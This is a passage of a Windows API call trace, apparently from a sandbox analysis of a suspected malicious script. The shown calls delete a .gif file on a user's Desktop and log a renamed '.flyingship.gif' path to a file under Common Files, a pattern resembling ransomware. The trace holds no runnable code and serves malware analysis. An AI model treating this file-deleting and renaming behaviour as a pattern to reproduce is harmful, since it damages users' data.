Size=0x8) returned 0x9c2618 [0164.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0164.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0164.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0164.497] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0164.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0164.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0164.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0164.497] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0164.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0164.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0164.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0164.497] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0164.497] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0164.497] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.497] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.497] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0164.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0164.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0164.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0164.497] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0164.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0164.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0164.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0164.498] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0164.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0164.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0164.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0164.498] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0164.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0164.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0164.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0164.498] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0164.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0164.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0164.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0164.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0164.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0164.498] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0164.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0164.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0164.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0164.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0164.498] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0164.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0164.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0164.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0164.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba540 [0164.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9ba540, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0164.499] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\na3pecvaltbr8vlk\\e5mhiatvfij2bqac0v.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0164.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0164.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0164.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0164.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0164.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0164.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0164.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0164.500] FreeLibrary (hLibModule=0x75990000) returned 1 [0164.500] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0164.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0164.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0164.500] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0164.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0164.500] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0164.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0164.500] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0164.500] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0164.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0164.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0164.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0164.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0164.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0164.500] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0164.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0164.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0164.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0164.501] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0164.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0164.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0164.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0164.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9ba0f0 [0164.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9ba0f0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0164.502] FreeLibrary (hLibModule=0x75990000) returned 1 [0164.502] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0164.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0164.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0164.502] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0164.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0164.502] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.503] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.503] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0164.503] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.503] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.503] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0164.503] FreeLibrary (hLibModule=0x75990000) returned 1 [0164.503] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.503] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.503] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.503] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif", lpFilePart=0x0) returned 0x4d [0164.505] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4262450, ftCreationTime.dwHighDateTime=0x1d5def5, ftLastAccessTime.dwLowDateTime=0x8e9e2530, ftLastAccessTime.dwHighDateTime=0x1d5e74b, ftLastWriteTime.dwLowDateTime=0x778d440, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xbc0c, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="E5mhIaTvFij2bqaC0v.gif", cAlternateFileName="E5MHIA~1.GIF")) returned 0x90af58 [0164.505] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\na3pecvaltbr8vlk\\e5mhiatvfij2bqac0v.gif")) returned 1 [0164.508] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4262450, ftCreationTime.dwHighDateTime=0x1d5def5, ftLastAccessTime.dwLowDateTime=0x8e9e2530, ftLastAccessTime.dwHighDateTime=0x1d5e74b, ftLastWriteTime.dwLowDateTime=0x778d440, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xbc0c, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="E5mhIaTvFij2bqaC0v.gif", cAlternateFileName="E5MHIA~1.GIF")) returned 0 [0164.508] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0164.514] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.514] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.514] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0164.514] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0164.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0164.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0164.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0164.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0164.515] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0164.515] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0164.515] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0164.515] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0164.515] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0164.516] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.516] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0164.516] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.516] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0164.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0164.517] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0164.517] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x8d0, lpOverlapped=0x0) returned 1 [0164.517] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0164.517] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x8d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.517] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0164.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0164.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0164.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0164.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0164.518] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.flyingship.gif\r\n", cchWideChar=91, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 91 [0164.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x5b) returned 0x9a5d78 [0164.518] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.flyingship.gif\r\n", cchWideChar=91, lpMultiByteStr=0x9a5d78, cbMultiByte=91, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.flyingship.gif\r\n", lpUsedDefaultChar=0x0) returned 91 [0164.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0164.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0164.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0164.518] WriteFile (in: hFile=0x120, lpBuffer=0x9a5d10*, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d10*, lpNumberOfBytesWritten=0x87f43c*=0x5a, lpOverlapped=0x0) returned 1 [0164.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0164.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0164.518] CloseHandle (hObject=0x120) returned 1 [0164.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0164.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0164.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0164.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0164.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0164.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0164.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0164.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0164.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0164.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0164.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0164.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0164.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0164.521] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0164.521] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0164.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0164.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0164.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0164.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0164.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9100 | out: hHeap=0x8a0000) returned 1 [0164.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0164.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0164.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0164.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0164.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0164.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0164.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0164.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0164.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0164.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0164.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 